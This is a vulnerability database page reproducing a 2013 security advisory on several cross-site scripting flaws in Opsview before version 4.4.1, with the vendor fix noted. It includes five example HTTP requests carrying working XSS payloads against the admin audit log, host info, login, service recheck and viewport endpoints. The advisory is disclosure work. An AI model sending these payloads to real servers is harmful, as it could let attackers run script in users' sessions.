Vulners
Lucene search
Ops View Pre 4.4.1 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2013-5695 | 5 Nov 201320:00 | – | cve |
 | CVE-2013-5695 | 5 Nov 201320:00 | – | cvelist |
 | EUVD-2013-5532 | 7 Oct 202500:30 | – | euvd |
 | CVE-2013-5695 | 5 Nov 201320:55 | – | nvd |
 | Cross site scripting | 5 Nov 201320:55 | – | prion |
 | CVE-2013-5695 | 22 May 202504:12 | – | redhatcve |
 | CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View | 9 Dec 201300:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 9 Dec 201300:00 | – | securityvulns |
`CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
Version(s): Opsview pre 4.4.1
Author: J. Oquendo (joquendo at e-fensive dot net)
I. ADVISORY
Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View
Date published: 2013-10-28
Vendor contacted: 2013-09-04
II. BACKGROUND
Opsview is a systems management software built on open
source software. To minimize noise, read more about it
here
http://www.opsview.com/about-us
II. DESCRIPTION
Opsview is vulnerable to a few different XSS based attacks.
/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/
There are a variety of iterations within those functions
which may allow a malicious user to trigger a cross site
scripting attack.
III. EXAMPLE
GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
------------
GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
------------
POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no
------------
POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
&from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit
------------
GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]
III SOLUTION
Opsview released a fix with Opsview 4.4.1
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes
--
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
"Where ignorance is our master, there is no possibility of
real peace" - Dalai Lama
42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x2BF7D83F210A95AF
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00225